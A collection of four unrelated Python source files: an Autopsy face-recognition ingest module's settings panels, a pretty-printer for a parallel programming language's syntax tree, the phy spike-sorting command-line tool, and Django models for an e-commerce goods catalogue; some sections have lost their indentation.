    buf = jarray.zeros(BLOCKSIZE, "b")
    # FIX: only feed the bytes actually read into the digest.  The
    # original updated with the WHOLE buffer on every read, so any short
    # read (and every file whose size is not a multiple of BLOCKSIZE)
    # hashed stale/zero trailing bytes and produced a wrong digest.
    # (Also renamed the loop variable, which shadowed builtin len().)
    bytes_read = inputStream.read(buf)
    while bytes_read != -1:
        hash_creator.update(buf[:bytes_read])
        bytes_read = inputStream.read(buf)
    time_consumed = time.time() - time_start
    return (hash_creator.hexdigest(), time_consumed)
#--------------------------------------------------------------------
# Split filename into basename and extension
#--------------------------------------------------------------------
def split_fname(self, fname):
    """Split *fname* into (basename, extension) around the LAST dot.

    Returns ("", "") for None/empty input and (fname, "") when there is
    no dot.  FIX: for names with several dots the original rebuilt the
    basename as '"" + "." + part' per segment, returning e.g.
    (".a.b", "c") for "a.b.c" -- the spurious leading dot then produced
    annotated-file paths that never matched the real files.
    """
    if fname is None or len(fname) == 0:
        return "", ""
    head, sep, ext = fname.rpartition(".")
    if not sep:
        # No extension
        return fname, ""
    return head, ext
#----------------------------------------------------------------------
# Global settings UI class, responsible for AI models weights location
# This is case independent
#----------------------------------------------------------------------
class UIGlobalSettingsPanel(IngestModuleGlobalSettingsPanel):
    """Case-independent settings panel: locations of the dlib model files.

    State is persisted to GLOBAL_CONFIGURATION_PATH as JSON with keys
    'save_files' (bool) and 'paths' (codes '0' detector, '1' recognizer,
    '2' shape predictor mapped to file paths).
    """

    def __init__(self):
        # FIX: the original also built save_file_cbox here, only for
        # initComponents() to immediately replace it with a new widget;
        # it is now created once, in initComponents().
        self.textInputs = {
            '0': JTextField('', 30),
            '1': JTextField('', 30),
            '2': JTextField('', 30)
        }
        self.buttons = {
            '0': JButton("Choose file", actionPerformed=self.chooseFolder),
            '1': JButton("Choose file", actionPerformed=self.chooseFolder),
            '2': JButton("Choose file", actionPerformed=self.chooseFolder)
        }
        self.initComponents()
        self.load()

    def checkBoxEvent(self, event):
        # Mirror the checkbox state; saveSettings() reads the widget itself.
        self.save_files = self.save_file_cbox.isSelected()

    def saveSettings(self):
        """Write the checkbox state and the three model paths to disk."""
        all_paths = {}
        for code in self.textInputs:
            all_paths[code] = self.textInputs[code].text
        with open(GLOBAL_CONFIGURATION_PATH, "w") as out:
            json.dump({
                "save_files": self.save_file_cbox.isSelected(),
                "paths": all_paths
            }, out)

    def load(self):
        """Populate the path fields from the global configuration file."""
        if os.path.exists(GLOBAL_CONFIGURATION_PATH):
            with open(GLOBAL_CONFIGURATION_PATH, "r") as out:
                content = json.load(out)
                # NOTE(review): checkbox state is saved but not restored.
                # self.save_file_cbox.setSelected(content['save_files'])
                self.textInputs['0'].text = content['paths']['0']
                self.textInputs['1'].text = content['paths']['1']
                self.textInputs['2'].text = content['paths']['2']

    def chooseFolder(self, e):
        """Let the user pick a model file for the row whose button fired *e*."""
        button = e.getSource()
        code = button.getActionCommand()
        fileChooser = JFileChooser()
        # NOTE(review): mode is FILES_ONLY although the dialog button says
        # "Choose folder"; the models are files, so the label looks wrong.
        fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY)
        ret = fileChooser.showDialog(self, "Choose folder")
        if ret == JFileChooser.APPROVE_OPTION:
            ff = fileChooser.getSelectedFile()
            path = ff.getCanonicalPath()
            self.textInputs[code].text = path

    def initComponents(self):
        """Build the Swing widgets (absolute/null layout)."""
        self.setLayout(None)
        self.setPreferredSize(Dimension(500, 400))
        lblNewLabel = JLabel("Detector model path:")
        lblNewLabel.setBounds(45, 144, 227, 16)
        self.add(lblNewLabel)
        lblNewLabel_1 = JLabel("Recognition model path:")
        lblNewLabel_1.setBounds(44, 210, 228, 16)
        self.add(lblNewLabel_1)
        lblNewLabel_2 = JLabel("Shape predictor model path:")
        lblNewLabel_2.setBounds(45, 275, 227, 16)
        self.add(lblNewLabel_2)
        self.textInputs['0'].setBounds(44, 173, 228, 22)
        self.textInputs['0'].setColumns(30)
        self.add(self.textInputs['0'])
        self.textInputs['1'].setColumns(30)
        self.textInputs['1'].setBounds(44, 238, 228, 22)
        self.add(self.textInputs['1'])
        self.textInputs['2'].setColumns(30)
        self.textInputs['2'].setBounds(45, 304, 228, 22)
        self.add(self.textInputs['2'])
        self.buttons['0'].setBounds(284, 172, 97, 25)
        self.buttons['0'].setActionCommand("0")
        self.add(self.buttons['0'])
        self.buttons['1'].setBounds(284, 237, 97, 25)
        self.buttons['1'].setActionCommand("1")
        self.add(self.buttons['1'])
        self.buttons['2'].setBounds(284, 303, 97, 25)
        self.buttons['2'].setActionCommand("2")
        self.add(self.buttons['2'])
        self.save_file_cbox = JCheckBox(C_LABEL_INFO_AUTOPSY_TEMP)
        self.save_file_cbox.setBounds(45, 98, 300, 25)
        self.add(self.save_file_cbox)
#----------------------------------------------------------------
# Case level settings object class
#----------------------------------------------------------------
class UISettings(IngestModuleIngestJobSettings):
serialVersionUID = 1L
def __init__(self):
# JPG JPEG PNG Delete file after
self.flags = [True, True, True, True]
self.paths = {
"1": ""
}
def getVersionNumber(self):
return self.serialVersionUID
def getFlag(self, pos):
return self.flags[pos]
def setFlag(self, flag, pos):
self.flags[pos] = flag
def setPath(self, code, path):
self.paths[code] = path
def getAllPaths(self):
return self.paths
def getAllFlags(self):
return self.flags
def getPath(self, code):
return self.paths[code]
def loadConfig(self):
CONFIGURATION_PATH = Case.getCurrentCase().getModuleDirectory() + "\\config.json"
if os.path.exists(CONFIGURATION_PATH):
with open(CONFIGURATION_PATH, "r") as out:
content = json.load(out)
self.flags = content['flags']
self.paths['1'] = content['wanted_folder']
#-------------------------------------------------------------
# Case level settings UI class
#-------------------------------------------------------------
class UISettingsPanel(IngestModuleIngestJobSettingsPanel):
    """Per-ingest-job settings panel (extension checkboxes + wanted folder)."""

    def __init__(self, settings):
        # Shared UISettings instance, mutated in place by the widgets.
        self.localSettings = settings
        self.buttons = {
            '1': JButton("Choose", actionPerformed=self.chooseFolder),
        }
        self.textInputs = {
            "1": JTextField('', 5),
        }
        self.initComponents()
        self.customizeComponents()

    def checkBoxEvent(self, event):
        # Push every checkbox state into the settings object
        # (flag order: 0=JPG, 1=JPEG, 2=PNG, 3=generate hash).
        self.localSettings.setFlag(self.checkboxJPG.isSelected(), 0)
        self.localSettings.setFlag(self.checkboxJPEG.isSelected(), 1)
        self.localSettings.setFlag(self.checkboxPNG.isSelected(), 2)
        self.localSettings.setFlag(self.chckbxGenerateImageHash.isSelected(), 3)

    def clear(self, e):
        # Reset the path whose clear-button fired *e*.
        button = e.getSource()
        code = button.getActionCommand()
        self.localSettings.setPath(code, "")
        self.textInputs[code].text = ""

    def chooseFolder(self, e):
        # Folder picker for the path row whose button fired *e*.
        button = e.getSource()
        code = button.getActionCommand()
        fileChooser = JFileChooser()
        fileChooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY)
        text = "Choose folder"
        ret = fileChooser.showDialog(self, text)
        if ret == JFileChooser.APPROVE_OPTION:
            ff = fileChooser.getSelectedFile()
            path = ff.getCanonicalPath()
            self.localSettings.setPath(code, path)
            self.textInputs[code].text = path

    def initComponents(self):
        """Build the Swing widgets (absolute/null layout)."""
        self.setLayout(None)
        lblFileExtensionsTo = JLabel("File extensions to look for:")
        lblFileExtensionsTo.setBounds(43, 37, 161, 16)
        self.add(lblFileExtensionsTo)
        self.checkboxPNG = JCheckBox(".PNG", actionPerformed=self.checkBoxEvent)
        self.checkboxPNG.setBounds(43, 62, 72, 25)
        self.add(self.checkboxPNG)
        self.checkboxJPG = JCheckBox(".JPG", actionPerformed=self.checkBoxEvent)
        self.checkboxJPG.setBounds(43, 92, 72, 25)
        self.add(self.checkboxJPG)
        self.checkboxJPEG = JCheckBox(".JPEG", actionPerformed=self.checkBoxEvent)
        self.checkboxJPEG.setBounds(118, 62, 113, 25)
        self.add(self.checkboxJPEG)
        lblNewLabel = JLabel("Folder with images of person to find:")
        lblNewLabel.setBounds(43, 145, 223, 16)
        self.add(lblNewLabel)
        textField = self.textInputs['1']
        textField.setBounds(43, 167, 223, 22)
        self.add(textField)
        textField.setColumns(30)
        self.buttons['1'].setActionCommand("1")
        self.buttons['1'].setBounds(43, 195, 113, 25)
        self.add(self.buttons['1'])
        #TODO:: This no longer is required, it's done within the executable
        self.chckbxGenerateImageHash = JCheckBox("Generate image hash for DFXML")
        self.chckbxGenerateImageHash.setBounds(43, 239, 223, 25)
        self.add(self.chckbxGenerateImageHash)

    def customizeComponents(self):
        # Restore the last saved configuration into the widgets.
        self.localSettings.loadConfig()
        self.checkboxJPG.setSelected(self.localSettings.getFlag(0))
        self.checkboxJPEG.setSelected(self.localSettings.getFlag(1))
        self.checkboxPNG.setSelected(self.localSettings.getFlag(2))
        self.chckbxGenerateImageHash.setSelected(self.localSettings.getFlag(3))
        for code in self.textInputs:
            self.textInputs[code].text = self.localSettings.getPath(code)

    def getSettings(self):
        # Autopsy callback: return the (already updated) settings object.
        return self.localSettings
|
# Copyright (c) 2010, James Hanlon, All rights reserved
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
import sys
import ast
from walker import NodeWalker
from definitions import *
from typedefs import *
INDENT = ' '
NO_INDENT = ''
class Printer(NodeWalker):
    """
    A walker class to pretty-print the AST in the language syntax.
    """
    def __init__(self, buf=sys.stdout, labels=False):
        # NOTE: the default buf is bound to sys.stdout at import time.
        super(Printer, self).__init__()
        self.buf = buf          # output stream
        self.labels = labels    # emit @(location) labels when True
        self.indent = []        # indentation stack; see indt()
def indt(self):
    """
    Produce an indent string for the current nesting depth.

    If it's the first statement of a seq or par block (marked by a
    NO_INDENT entry on top of the stack) no indentation is produced.
    """
    if not self.indent:
        return ''
    if self.indent[-1] == NO_INDENT:
        return ''
    return INDENT * len(self.indent)
def out(self, s):
    """
    Write *s* preceded by the current indentation.
    """
    prefix = self.indt()
    self.buf.write(prefix + s)
def arg_list(self, args):
    """Return the comma-separated printed form of the expressions in *args*."""
    return ', '.join(self.expr(a) for a in args)
def var_decls(self, decls):
    """Write all variable declarations, one per indented line, ';'-terminated."""
    if not decls:
        self.buf.write('')
        return
    separator = ';\n' + self.indt()
    body = separator.join(self.decl(d) for d in decls)
    self.buf.write(self.indt() + body)
    self.buf.write(';\n')
def display_location(self, stmt):
if self.labels and hasattr(stmt, 'location') and not stmt.location==None:
self.out('@({})\n'.format(self.expr(stmt.location)))
# Program ============================================
def walk_program(self, node):
# Program declarations
self.var_decls(node.decls)
self.buf.write('\n')
# Program definitions (procedures)
[self.defn(x, 0) for x in node.defs]
# Variable declarations ===============================
def decl(self, node):
if node.type == T_VAL_SINGLE:
return 'val {} is {}'.format(node.name, self.expr(node.expr))
if node.type == T_VAR_SINGLE:
return 'var {}'.format(node.name)
elif node.type == T_VAR_ARRAY:
return 'var {}[{}]'.format(node.name, self.expr(node.expr))
elif node.type == T_REF_ARRAY:
return node.name+'[]'
elif node.type == T_CHAN_SINGLE:
return 'chan '+node.name
elif node.type == T_CHAN_ARRAY:
return 'chan '+node.name+'[{}]'.format(self.expr(node.expr))
elif node.type == T_CHANEND_SINGLE:
return 'chanend '+node.name
elif node.type == T_CHANEND_SERVER_SINGLE:
return 'server chanend '+node.name
elif node.type == T_CHANEND_CLIENT_SINGLE:
return 'client chanend '+node.name
else:
assert 0
# Procedure declarations ==============================
def defn(self, node, d):
# Procedure definition
name = node.name if node.name != '_main' else 'main'
self.buf.write('{} {}({})'.format(node.type.specifier, name,
', '.join([self.param(x) for x in node.formals])))
# If it is a prototype
if not node.stmt:
self.buf.write(';\n\n')
else:
self.buf.write(' is\n')
# Statement block
if (isinstance(node.stmt, ast.StmtPar)
or isinstance(node.stmt, ast.StmtSeq)):
#self.indent.pop()
self.display_location(node.stmt)
self.stmt(node.stmt)
self.buf.write('\n\n')
else:
self.indent.append(INDENT)
self.display_location(node.stmt)
self.stmt(node.stmt)
self.buf.write('\n\n')
self.indent.pop()
# Formals =============================================
def param(self, node):
if node.type == T_VAL_SINGLE:
return 'val '+node.name
elif node.type == T_REF_SINGLE:
return 'var '+node.name
elif node.type == T_REF_ARRAY:
return 'var {}[{}]'.format(node.name, self.expr(node.expr))
elif node.type == T_CHANEND_SINGLE:
return 'chanend {}'.format(node.name)
elif node.type == T_CHANEND_SERVER_SINGLE:
return 'chanend server {}'.format(node.name)
elif node.type == T_CHANEND_CLIENT_SINGLE:
return 'chanend client {}'.format(node.name)
elif node.type == T_CHANEND_ARRAY:
return 'chanend {}[{}]'.format(node.name, self.expr(node.expr))
elif node.type == T_CHAN_SINGLE:
return 'chan {}'.format(node.name)
elif node.type == T_CHAN_ARRAY:
return 'chan {}[{}]'.format(node.name, self.expr(node.expr))
else:
assert 0
# Statements ==========================================
def stmt_block(self, node, sep):
"""
Output a block of statements. E.g.::
{
stmt1;
stmt2;
{ stmt3 &
stmt4
};
stmt5
}
"""
self.out('{\n')
self.indent.append(INDENT)
self.var_decls(node.decls)
for (i, x) in enumerate(node.stmt):
if sep=='&':
self.stmt(x)
else:
self.stmt(x)
self.buf.write(sep if i<(len(node.stmt)-1) else '')
self.buf.write('\n')
self.indent.pop()
self.out('}')
if hasattr(node, 'distribute') and node.distribute:
self.out('$')
def stmt_seq(self, node):
self.stmt_block(node, ';')
def stmt_par(self, node):
self.stmt_block(node, '&')
def stmt_server(self, node):
#self.display_location(node)
self.out('server({}){}\n'.format(', '.join(
[self.param(x) for x in node.decls]), '$' if node.distribute else ''))
self.indent.append(INDENT)
#self.display_location(node.server)
self.stmt(node.server)
self.indent.pop()
self.out('\n')
self.indent.append(INDENT)
#self.display_location(node.client)
self.stmt(node.client)
self.indent.pop()
def stmt_rep(self, node):
self.out('par {} do\n'.format(
', '.join([self.elem(x) for x in node.indices])))
self.indent.append(INDENT)
self.display_location(node.stmt)
self.stmt(node.stmt)
self.indent.pop()
def stmt_on(self, node):
self.out('on {} do\n'.format(self.expr(node.expr)))
self.indent.append(INDENT)
# NOTE: This location won't show where we have made substitutions in
# transform par and rep and we hav'nt updated the location labels.
self.display_location(node.stmt)
self.stmt(node.stmt)
self.indent.pop()
def stmt_skip(self, node):
self.out('skip')
def stmt_pcall(self, node):
self.out('{}({})'.format(
node.name, self.arg_list(node.args)))
def stmt_ass(self, node):
self.out('{} := {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_in(self, node):
self.out('{} ? {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_out(self, node):
self.out('{} ! {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_in_tag(self, node):
self.out('{} ?? {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_out_tag(self, node):
self.out('{} !! {}'.format(
self.elem(node.left), self.expr(node.expr)))
def stmt_alias(self, node):
self.out('{} aliases {}'.format(
self.elem(node.left), self.elem(node.slice)))
def stmt_connect(self, node):
if node.type == CONNECT_MASTER:
self.out('connect {}:{} to slave {}'.format(self.elem(node.left),
self.expr(node.id), self.expr(node.expr)))
elif node.type == CONNECT_SLAVE:
self.out('connect {}:{} to master {}'.format(self.elem(node.left),
self.expr(node.id), self.expr(node.expr)))
elif node.type == CONNECT_CLIENT:
self.out('connect {}:{} to server {}'.format(self.elem(node.left),
self.expr(node.id), self.expr(node.expr)))
elif node.type == CONNECT_SERVER:
self.out('connect {}:{} to client'.format(self.elem(node.left),
self.expr(node.id)))
else:
assert 0
def stmt_if(self, node):
self.out('if {}\n'.format(self.expr(node.cond)))
self.out('then\n')
self.indent.append(INDENT)
self.stmt(node.thenstmt) ; self.buf.write('\n')
self.indent.pop()
self.out('else\n')
self.indent.append(INDENT)
self.stmt(node.elsestmt)
self.indent.pop()
def stmt_while(self, node):
self.out('while {} do\n'.format(self.expr(node.cond)))
self.indent.append(INDENT)
self.stmt(node.stmt)
self.indent.pop()
def stmt_for(self, node):
self.out('for {} do\n'.format(self.elem(node.index)))
self.indent.append(INDENT)
self.stmt(node.stmt)
self.indent.pop()
def stmt_assert(self, node):
self.out('assert {}'.format(self.expr(node.expr)))
def stmt_return(self, node):
self.out('return {}'.format(self.expr(node.expr)))
# Expressions =========================================
def expr_single(self, node):
return self.elem(node.elem)
def expr_unary(self, node):
return '({}{})'.format(node.op, self.elem(node.elem))
def expr_binop(self, node):
return '{} {} {}'.format(self.elem(node.elem),
node.op, self.expr(node.right))
# Elements= ===========================================
def elem_group(self, node):
return '({})'.format(self.expr(node.expr))
def elem_sub(self, node):
return '{}[{}]'.format(node.name, self.expr(node.expr))
def elem_slice(self, node):
return '{}[{} for {}]'.format(node.name,
self.expr(node.base), self.expr(node.count))
def elem_index_range(self, node):
return '{} in [{} for {}]'.format(node.name,
self.expr(node.base), self.expr(node.count))
def elem_fcall(self, node):
return '{}({})'.format(node.name, self.arg_list(node.args))
def elem_pcall(self, node):
return '{}({})'.format(node.name, self.arg_list(node.args))
def elem_number(self, node):
return '{}'.format(node.value)
def elem_boolean(self, node):
return '{}'.format(node.value)
def elem_string(self, node):
return '{}'.format(node.value)
def elem_char(self, node):
return '{}'.format(node.value)
def elem_id(self, node):
return node.name
|
# -*- coding: utf-8 -*-
"""phy main CLI tool.
Usage:
phy --help
"""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import sys
import os.path as op
import re
import argparse
from textwrap import dedent
from ..ext.six import exec_
#------------------------------------------------------------------------------
# Main script
#------------------------------------------------------------------------------
class Parser(argparse.ArgumentParser):
    """Argument parser that prints the full help on error before exiting."""

    def error(self, message):
        """Report *message* on stderr, show usage help, and exit with code 2."""
        sys.stderr.write('{}\n\n'.format(message))
        self.print_help()
        sys.exit(2)
class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter,
                      argparse.RawDescriptionHelpFormatter):
    """Help formatter that shows argument defaults and keeps the epilog's
    raw (un-rewrapped) formatting."""
def _parse_extra(extra):
kwargs = {}
reg = re.compile(r'^--([^\=]+)=([^\=]+)$')
for e in extra:
r = reg.match(e)
if r:
key, value = r.group(1), r.group(2)
key = key.replace('-', '_')
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
pass
kwargs[key] = value
return kwargs
def _parse_args(args):
    """Parse the command line; return ``(namespace, extra_kwargs)``.

    Unknown ``--key=value`` options are collected by ``_parse_extra`` and
    returned separately so they can be forwarded to the chosen command.
    """
    # The phy package docstring doubles as the CLI description.
    desc = sys.modules['phy'].__doc__
    epilog = dedent("""
    examples:
      phy -v display the version of phy
      phy describe my_file.kwik
        display information about a Kwik dataset
      phy cluster-auto my_file.kwik --num-clusters-start=100
        run klustakwik on a dataset
      phy cluster-manual my_file.kwik
        run the manual clustering GUI
    """)
    parser = Parser(description=desc, epilog=epilog,
                    formatter_class=CustomFormatter,
                    )
    # Allowed subcommands.
    commands = [
        'cluster-auto',
        'cluster-manual',
        'describe',  # describe a dataset
        # TODO:
        # 'notebook',  # start a new analysis notebook
        # 'detect-spikes',
    ]
    parser.add_argument('command',
                        choices=commands,
                        help='command to execute')
    parser.add_argument('file',
                        help='file to execute the command on')
    import phy
    parser.add_argument('--version', '-v',
                        action='version',
                        version=phy.__version__,
                        help='print the version of phy')
    parser.add_argument('--debug', '-d',
                        action='store_true',
                        help='activate debug logging mode')
    parser.add_argument('--profiler', '-p',
                        action='store_true',
                        help='activate the profiler')
    parser.add_argument('--line-profiler', '-lp',
                        dest='line_profiler',
                        action='store_true',
                        help='activate the line-profiler -- you need to '
                        'decorate the functions to profile with `@profile` '
                        'in the code')
    parser.add_argument('--ipython', '-i', action='store_true',
                        help='launch the script in an interactive '
                        'IPython console')
    parser.add_argument('--clustering', default='main',
                        help='name of the clustering to use')
    parser.add_argument('--cluster_ids', '-c',
                        help='list of clusters to select initially')
    # parse_known_args keeps unrecognised tokens for _parse_extra.
    parse, extra = parser.parse_known_args(args)
    kwargs = _parse_extra(extra)
    return parse, kwargs
def run_manual(kwik_path, clustering=None, interactive=False,
               cluster_ids=None):
    """Launch the manual clustering GUI on *kwik_path*.

    Returns 1 if the file does not exist; otherwise blocks in the Qt
    event loop (or in an IPython session when *interactive* is True).
    """
    import phy
    from phy.cluster import Session
    from phy.gui import start_qt_app, run_qt_app
    if not op.exists(kwik_path):
        print("The file `{}` doesn't exist.".format(kwik_path))
        return 1
    print("\nLoading {}...".format(kwik_path))
    session = Session(kwik_path,
                      clustering=clustering,
                      )
    print("Data successfully loaded!\n")
    session.model.describe()
    # The Qt application must exist before any GUI widget is created.
    start_qt_app()
    gui = session.show_gui(cluster_ids=cluster_ids, show=False)
    print("\nPress `ctrl+h` to see the list of keyboard shortcuts.\n")
    # Interactive mode with IPython.
    if interactive:
        print("\nStarting IPython...")
        from IPython import start_ipython
        # Namespace.
        ns = {'phy': phy,
              'session': session,
              'model': session.model,
              'kwik_path': kwik_path,
              'gui': gui,
              }
        # IPython drives the Qt event loop itself and shows the GUI on start.
        start_ipython(["--gui=qt", "-i", "-c='gui.show()'"], user_ns=ns)
    else:
        gui.show()
        run_qt_app()
def run_auto(kwik_path, clustering=None, interactive=False, **kwargs):
    """Run automatic clustering on *kwik_path* and save the results.

    Extra ``**kwargs`` are forwarded to ``Session.cluster`` (e.g.
    klustakwik parameters from the command line).
    NOTE(review): *interactive* is accepted for signature parity with
    run_manual but is currently unused here.
    """
    from phy.cluster import Session
    if not op.exists(kwik_path):
        print("The file `{}` doesn't exist.".format(kwik_path))
        return
    session = Session(kwik_path, use_store=False)
    session.cluster(clustering=clustering, **kwargs)
    session.save()
    session.close()
def describe(kwik_path, clustering=None):
    """Print a summary of the Kwik dataset at *kwik_path* and close it."""
    from phy.io.kwik import KwikModel
    if not op.exists(kwik_path):
        print("The file `{}` doesn't exist.".format(kwik_path))
        return
    model = KwikModel(kwik_path, clustering=clustering)
    model.describe()
    model.close()
def main():
    """CLI entry point: parse ``sys.argv`` and dispatch the chosen command."""
    args, kwargs = _parse_args(sys.argv[1:])
    if args.profiler or args.line_profiler:
        from phy.utils.testing import _enable_profiler, _profile
        prof = _enable_profiler(args.line_profiler)
    else:
        prof = None
    import phy
    if args.debug:
        phy.debug()
    # Optional initial cluster selection, given as comma-separated ints.
    if args.cluster_ids:
        cluster_ids = list(map(int, args.cluster_ids.split(',')))
    else:
        cluster_ids = None
    # The command is built as a source string so the very same code path
    # can run it either directly or under the profiler.
    if args.command == 'cluster-manual':
        cmd = ('run_manual(args.file, clustering=args.clustering, '
               'interactive=args.ipython, cluster_ids=cluster_ids)')
    elif args.command == 'cluster-auto':
        cmd = ('run_auto(args.file, clustering=args.clustering, '
               'interactive=args.ipython, **kwargs)')
    elif args.command == 'describe':
        cmd = 'describe(args.file)'
    else:
        raise NotImplementedError()
    if not prof:
        exec_(cmd, globals(), locals())
    else:
        _profile(prof, cmd, globals(), locals())
#------------------------------------------------------------------------------
# Entry point
#------------------------------------------------------------------------------

# Run the CLI only when executed as a script, not on import.
if __name__ == '__main__':
    main()
|
from django.db import models
from django.contrib.auth.models import User
from jsonfield import JSONField
# Create your models here.
class FirstClass(models.Model):
    """Top-level goods category (一级类目)."""
    first_class_name = models.CharField(max_length=100, help_text='一级类目名称', unique=True)
    # Category cover image, stored under a date-stamped directory.
    cover_path = models.ImageField(upload_to='sjmeigou/goods/firstclass/%Y%m%d')
    # Unique sort key; drives the default ordering below.
    sort_order = models.SmallIntegerField(unique=True)
    last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
    create_time = models.DateTimeField(auto_now_add=True, editable=False)
    update_time = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        return self.first_class_name

    class Meta:
        ordering = ['sort_order']
class SecondClass(models.Model):
    """Second-level category, nested under a FirstClass."""
    first_class = models.ForeignKey(to='FirstClass', on_delete=models.CASCADE, help_text='选择一级类目',
                                    related_name='second_classes')
    second_class_name = models.CharField(max_length=100, help_text='填写二级类目名称')
    last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
    create_time = models.DateTimeField(auto_now_add=True, editable=False)
    update_time = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        return "%s:%s" % (self.first_class.first_class_name, self.second_class_name)

    class Meta:
        # A name may repeat under different parents, but not within one.
        unique_together = ['first_class', 'second_class_name']
class ThirdClass(models.Model):
    """Third-level (leaf) category, nested under a SecondClass."""
    second_class = models.ForeignKey(to='SecondClass', on_delete=models.CASCADE, help_text='选择二级类目')
    third_class_name = models.CharField(max_length=100, help_text='填写三级类目名称')
    last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
    create_time = models.DateTimeField(auto_now_add=True, editable=False)
    update_time = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        # Full path: first:second:third.
        return "%s:%s:%s" % (
            self.second_class.first_class.first_class_name, self.second_class.second_class_name, self.third_class_name)

    class Meta:
        unique_together = ['second_class', 'third_class_name']
class FirstProperty(models.Model):
    """First-level property attached to a leaf (third-level) category."""
    first_property_name = models.CharField(max_length=100, help_text='填写类目属性')
    third_class = models.ForeignKey(to='ThirdClass', on_delete=models.CASCADE, blank=True, help_text='选择三级类目')
    last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
    create_time = models.DateTimeField(auto_now_add=True, editable=False)
    update_time = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        # Full path: first:second:third:property.
        return "%s:%s:%s:%s" % (
            self.third_class.second_class.first_class.first_class_name, self.third_class.second_class.second_class_name,
            self.third_class.third_class_name, self.first_property_name)

    class Meta:
        unique_together = ['third_class', 'first_property_name']
class SecondProperty(models.Model):
    """Second-level property value belonging to a FirstProperty."""
    second_property_name = models.CharField(max_length=100, help_text='填写二级属性名称')
    first_property = models.ForeignKey(to='FirstProperty', on_delete=models.CASCADE, help_text='选择一级属性',
                                       related_name='secondProperties')
    last_operator = models.ForeignKey(to=User, on_delete=models.DO_NOTHING, editable=False)
    create_time = models.DateTimeField(auto_now_add=True, editable=False)
    update_time = models.DateTimeField(auto_now=True, editable=False)

    class Meta:
        unique_together = ['first_property', 'second_property_name']
class ItemsGroupDesc(models.Model):
    """Free-form item description payload owned by a user."""
    owner = models.ForeignKey(to=User, on_delete=models.CASCADE, editable=False)
    # Arbitrary JSON describing the item group's contents.
    items = JSONField()
class SizeGroup(models.Model):
    """Named group of sizes scoped to a second-level category."""
    group_name = models.CharField(max_length=50)
    second_class = models.ForeignKey(to='SecondClass', on_delete=models.CASCADE)

    def __str__(self):
        return '%s:%s-%s' % (self.second_class.second_class_name, self.group_name, self.id)
class SizeDesc(models.Model):
    """A single size option within a SizeGroup."""
    size_group = models.ForeignKey(to='SizeGroup', on_delete=models.CASCADE, related_name='sizes')
    size_name = models.CharField(max_length=50)

    class Meta:
        unique_together = ('size_group', 'size_name')
        # Insertion order doubles as display order.
        ordering = ('id',)
class SizeGroupClass(models.Model):
    """Many-to-many link between a third-level category and a size group."""
    third_class = models.ForeignKey(to='ThirdClass', on_delete=models.CASCADE, related_name='size_group_classes')
    size_group = models.ForeignKey(to='SizeGroup', on_delete=models.CASCADE, related_name='size_classes')
class SKUColor(models.Model):
    """Color variant of a good; parent of the concrete SKUs."""
    good_detail = models.ForeignKey(to='GoodDetail', on_delete=models.CASCADE, related_name='colors')
    color_name = models.CharField(max_length=20)
    color_remark = models.CharField(max_length=30, blank=True, null=True)
    # Image URL/path for this color variant.
    color_pic = models.CharField(max_length=255)
    # Hex color value, e.g. '#ffffff' (7 chars).
    color_code = models.CharField(max_length=7)
class SKU(models.Model):
    """Concrete sellable unit: one (color, size) combination with price/stock."""
    color = models.ForeignKey(to='SKUColor',related_name='skus',on_delete=models.CASCADE)
    price = models.DecimalField(max_digits=20, decimal_places=2)
    stock = models.IntegerField(default=0)
    # Size is kept nullable so deleting a SizeDesc does not delete the SKU.
    size = models.ForeignKey(to='SizeDesc', on_delete=models.SET_NULL,null=True)
    merchant_coding = models.CharField(max_length=50,blank=True,null=True)
    barcode = models.CharField(max_length=100,blank=True,null=True)
class GoodDetail(models.Model):
    """A store's good (product) with pricing, stock and listing strategy."""
    owner=models.ForeignKey(to=User,editable=False,on_delete=models.CASCADE,related_name='goodDetails')
    third_class=models.ForeignKey(to='ThirdClass',on_delete=models.DO_NOTHING,related_name='goodDetails')
    title=models.CharField(max_length=50)
    # Category-property values as JSON.
    params = JSONField()
    master_map = models.URLField(null=True)
    master_graphs = JSONField()
    master_video=models.URLField(null=True,blank=True)
    # Lowest price across this good's SKUs; denormalised for listing pages.
    min_price = models.DecimalField(max_digits=20, decimal_places=2)
    # Sum of SKU stock; denormalised for listing pages.
    total_stock = models.IntegerField(default=0)
    merchant_coding=models.CharField(max_length=50,blank=True,null=True)
    barcode = models.CharField(max_length=100,blank=True,null=True)
    # 0 = decrement stock on order placed, 1 = on payment.
    stock_count_strategy=models.IntegerField(
        choices=((0,'买家拍下减库存'),(1,'买家付款减库存')),default=0
    )
    # Promised dispatch window, in hours.
    to_deliver_hours = models.IntegerField(choices=(
        (1, '1小时内'), (2, '2小时内'), (24, '24小时内'), (48, '48小时内')
    ))
    put_on_sale_time=models.DateTimeField()
    # 0 = list immediately, 1 = list at put_on_sale_time, 2 = keep in warehouse.
    put_on_strategy=models.SmallIntegerField(default=0,choices=((0,'立即上架'),(1,'定时上架'),(2,'放入仓库内')))
    # 0 = on sale, 1 = in warehouse, 2 = deleted (soft delete).
    state=models.SmallIntegerField(default=0,choices=((0,'出售中'),(1,'仓库中'),(2,'已删除')),editable=False)
    item_desc=models.OneToOneField(to='ItemsGroupDesc',on_delete=models.CASCADE)
    good_type=models.ForeignKey(to='store.GoodsType',on_delete=models.SET_NULL,blank=True,null=True,related_name='goods')
    store=models.ForeignKey(to='store.Stores',on_delete=models.CASCADE,editable=False,related_name='goods')
